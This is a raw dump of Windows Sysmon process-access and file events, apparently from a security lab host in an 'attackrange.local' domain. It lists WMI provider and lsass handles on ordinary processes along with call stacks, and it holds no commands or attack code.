Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237797Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D64-603E-84AA-00000000AD01}9536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.106{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D166387B347BCE958F4555C5464127F2,SHA256=9DBFB911BBD597899E9A4BC4867E964C568347E459702B09FB856AE90E19786E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 